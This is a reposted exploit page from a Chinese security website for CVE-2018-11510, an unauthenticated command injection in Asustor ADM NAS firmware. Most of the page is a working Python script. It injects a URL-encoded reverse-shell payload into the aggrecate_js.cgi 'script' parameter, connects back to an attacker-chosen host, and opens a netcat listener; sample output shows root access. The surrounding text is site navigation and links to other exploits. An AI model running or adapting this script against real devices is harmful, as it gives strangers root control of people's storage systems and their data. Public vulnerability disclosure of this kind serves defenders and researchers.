首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ADM 3.1.2RHG1 - Remote Code Execution
来源:@haqur 作者:Fulton 发布时间:2018-08-27  
# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
# Author: Matthew Fulton & Kyle Lovett
# Date: 2018-07-01
# Vendor Homepage: https://www.asustor.com/
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
# Version: <= ADM 3.1.2RHG1
# Tested on: ASUSTOR AS6202T
# CVE : CVE-2018-11510
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
 
#!/usr/bin/python
 
"""
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
if exploitation occurs successfully, a root shell is granted
Authors: matthew fulton and Kyle Lovett
Date: 27 May 2018
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
After a twitter communication Kyle was kind enough to share a few details
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
Vendor link: https://www.asustor.com
 
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
starting netcat listener on port 1234
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # uname -a;id
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
"""
 
import sys, threading, time, os, subprocess
import urllib2
import ssl
import argparse
 
 
class exploit(object):
    def __init__(self,interval=1):
        self.target = args.target
        self.rport = args.port
        self.lport = args.lport
        self.remote = args.remote
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()
 
    def run(self):
        #ignore ssl warnings
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        while True:
            try:
                turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
                "launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
                "(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
                "%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
                "subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
                response=urllib2.urlopen(turl,context=ctx)
                time.sleep(self.interval)
            except urllib2.URLError as e:
                print "Something is wrong:|"
                print e
                os._exit(1)
 
def revShell():
    print "starting netcat listener on port "+args.lport
    cmd = "nc -lv {0}".format(args.lport)
    os.system(cmd)
 
def main():
    print """exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
    goexploit = exploit()
    revShell()
 
if __name__ == '__main__':
    Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
    authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
    parser=argparse.ArgumentParser(description=help)
    parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
    parser.add_argument('--port', '-p', default="8001")
    parser.add_argument('--lport', '-l', default="1234")
    parser.add_argument('--remote','-r', default="192.168.1.253")
    args = parser.parse_args()
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CEWE Photoshow 6.3.4 - Denial
·Microsoft Edge Chakra JIT - Im
·OpenSSH 2.3 < 7.7 - Username E
·Microsoft Edge Chakra JIT - Pa
·Mikrotik WinBox 6.42 - Credent
·Microsoft Edge Chakra JIT - 'D
·Central Management Software 1.
·Microsoft Edge Chakra JIT - 'I
·ObserverIP Scan Tool 1.4.0.1 -
·Microsoft Edge Chakra JIT - In
·Foxit Reader 9.0.1.1049 Buffer
·SEIG SCADA System 9 - Remote C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved